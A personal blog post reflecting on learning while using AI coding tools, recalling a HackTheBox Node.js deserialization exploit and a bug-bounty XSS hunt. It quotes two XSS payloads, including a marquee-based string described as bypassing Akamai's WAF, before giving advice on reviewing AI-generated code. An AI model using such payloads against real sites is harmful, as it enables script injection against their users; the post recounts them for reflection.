Learning in the age of AI

Posted on Dec 7, 2025

What does “learning” even mean in a world where AI can build, debug, and optimize code faster than we can open Stack Overflow? That question hit me recently—and it led me down a long path of reflection.

Over the past few months, I have been using AI tools in my day-to-day. Tools such as ChatGPT, Perplexity, Amazon Q, Cursor, etc.

A couple of weeks ago, I needed to build an automation using Python, so I decided to use Amazon Q for the task. I wrote down my requirements and entered them into Q’s chat panel. Within a couple of minutes, it had generated the entire script along with the required dependencies. All I had to do was run pip install -r requirements.txt and then python automation.py and voilà, the automation worked exactly the way I wanted.

I decided to refine it further with security and optimization in mind. I prompted Q to make the improvements, and it updated the script almost instantly

Feeling good about the progress, I shut down my system for the day. But as I stepped away, the reflective part of my brain kicked in. What had just happened? That one moment triggered a cascade of thoughts about learning, efficiency, and how AI is quietly reshaping how we work.

I’ve worked with Python before, but writing the same automation myself would have easily taken 5–6 days. With Amazon Q, I was able to complete it in just a couple of hours.

But even if I had decided to build it manually, it wouldn’t have been a movie-style moment where I simply pulled up the requirements and started typing away. It would have taken time to lay down the basic structure, go through trial and error, troubleshoot and debug endlessly, learn or revisit the libraries and dependencies I planned to use, read their documentation, and piece everything together step by step.

As those thoughts settled in, I started asking myself a few simple but important questions:

  1. Did I actually learn anything new? If I’m being honest, the answer was no.
  2. Did the job get done? That’s a clear yes.
  3. Could I have written the same code myself, with the same level of security and optimization? Maybe—but it would have taken much longer.

Out of all three, the first question lingered the most. I’ve always believed in staying a learner, no matter how much experience I gain, and in that moment I wasn’t entirely sure if I had lived up to that belief

Throwback: How I Used to Learn

Before diving deeper into my reflections, I found myself thinking back to the early days of my infosec journey — back when I was still figuring things out and every problem felt like a puzzle waiting to be solved.

One piece of advice from a senior stuck with me: “Always try to find the solution yourself first. If you still can’t figure it out, then reach out to others.”

I’ve followed that approach ever since, and it shaped my entire learning philosophy. It taught me patience, curiosity, and the value of getting my hands dirty before looking for shortcuts.

HackTheBox: Celestial

Back in 2017–18, I spent a lot of time solving HackTheBox machines to sharpen my pentesting and red teaming skills. One of the machines I attempted was Celestial, which required exploiting a Node.js deserialization vulnerability. After researching the topic, I found a blog post explaining how to craft a payload for remote code execution, so I followed along and built the reverse shell and payload using the sample code provided.

When I sent the payload through Burp Suite, I kept hitting a Node.js syntax error. Since I wasn’t familiar with Node.js back then, the error didn’t make much sense to me.

I revisited the blog post, repeated the steps carefully, and made sure I hadn’t missed anything—but the same error kept coming back. So I put on my “learning hat” and started digging deeper. I Googled the error, jumped through multiple Stack Overflow threads, and followed different debugging paths until I finally discovered the issue: I was missing a closing curly brace } in my payload before serialization. That tiny mistake was breaking the entire payload.

Once I fixed it, I successfully exploited the machine.

Looking back, I realize just how much I learned from that single experience. Going down that rabbit hole of errors, Google searches, Stack Overflow threads, and trial-and-error debugging taught me far more than simply fixing a broken payload. I didn’t just solve the issue—I picked up pieces of Node.js syntax, serialization quirks, and debugging patterns that I had never been exposed to before.

If I had been using an AI tool back then, I probably would have solved the problem in just a few prompts. It would have given me the corrected payload, explained the syntax error, and I would’ve moved on. But in doing so, I would have missed the deeper learning—the kind that only comes from struggling with the problem, understanding why something is breaking, and slowly piecing together the underlying concepts. In this case, that struggle is exactly what taught me more about Node.js than I had ever known at the time.

Bug Hunting: Akamai XSS WAF Bypass

Around the same time, I was also actively involved in bug hunting. One particular target looked suspiciously vulnerable to XSS vulnerabilities because my input was being reflected directly in the response. Naturally, I started with a simple payload: <script>prompt(1)</script>

Instead of triggering an alert, I got an error indicating that Akamai’s WAF was blocking my request, flagging it as an XSS attempt.

I tried a bunch of common payloads—nothing worked. So I took a step back and started analyzing exactly which characters were allowed and which were being blocked. For the next few days, I tested combinations, broke down payload structures, and slowly mapped out how the WAF was filtering requests.

After about five days of trial and error, I finally landed on a working payload: <marquee+loop=1+width=0+onfinish='new+Functional\ert1'>

I reported the finding, and although it turned out to be a duplicate, it was still validated as a genuine XSS bypass for Akamai and later made its way into the Awesome WAF List

Looking back, I often wonder how different that process would have been in today’s age of AI. If I had access to ChatGPT or any security-focused AI tool, I could have generated dozens of bypass attempts in minutes. It would’ve saved me days of manual work—but it also would’ve cost me the deeper understanding I gained by grinding through research papers, XSS blogs, WAF bypass techniques, and hands-on experimentation.

Relearning How to Learn in the Age of AI

Coming back to the present, I want to be clear: I’m not against using AI tools for building or troubleshooting. In fact, I believe we should use them—actively and effectively. They help us move faster, explore more ideas, and focus on higher-level thinking, all while keeping security and optimization in mind.

But at the same time, we need to make sure we’re actually learning from them, not just using them as a shortcut. AI can accelerate the work, but it can’t replace the depth of understanding that comes from engaging with the problem yourself.

Over time, I’ve started adopting a few approaches to make sure I’m leveraging AI tools while still growing as an engineer.

Here are some of the practices I’ve started following to make sure I’m getting the most out of AI tools while still learning along the way:

  • Review the code that AI generates: When I use AI tools to build something new, I ensure that I go through the code generated by the AI tool to understand what is going on and whether there is something new I can learn.

  • Ask follow-up questions: If needed, I even ask Amazon Q/Cursor to explain the code in more detail and ask follow-up questions.

  • Evaluate changes carefully: When prompting to make changes/tweaks to the code, once the changes are made, I review them to understand what was done, and if needed, ask follow-up questions/explainers.

  • Inspect dependencies and functions: I review the dependencies being used and the functions being called. I may also read the documentation or ask the tool to summarize about them

  • Verify line numbers and references: Code-generation tools often misalign line numbers or point to lines that don’t exist. This is a known issue, so I always double-check those. For reference, See #505, #271005, and AI LLMs can’t count lines in a file

  • Prioritize security: As a security enthusiast, I make sure to prompt tools to use the latest dependency versions and follow secure coding practices. Read Why Your AI Code Assistant Might Be Shipping CVEs, Security-Focused Guide for AI Code Assistant Instructions, & Free AI Coding Security Rules

  • Read the full troubleshooting analysis: When using AI to debug issues, I don’t just copy-paste the solution. I read the reasoning to understand what went wrong and how the fix works.

  • Further Reading

AI helps me get work done in minutes, but the lessons that stay with me still come from the messy parts—debugging, experimenting, failing, and trying again. As we move deeper into the age of AI, I’m learning to balance both speed and understanding. One helps me deliver; the other helps me grow.

If you have your own thoughts or experiences about learning in the age of AI, I’d love to hear from you. Feel free to reach out or connect with me on LinkedIn.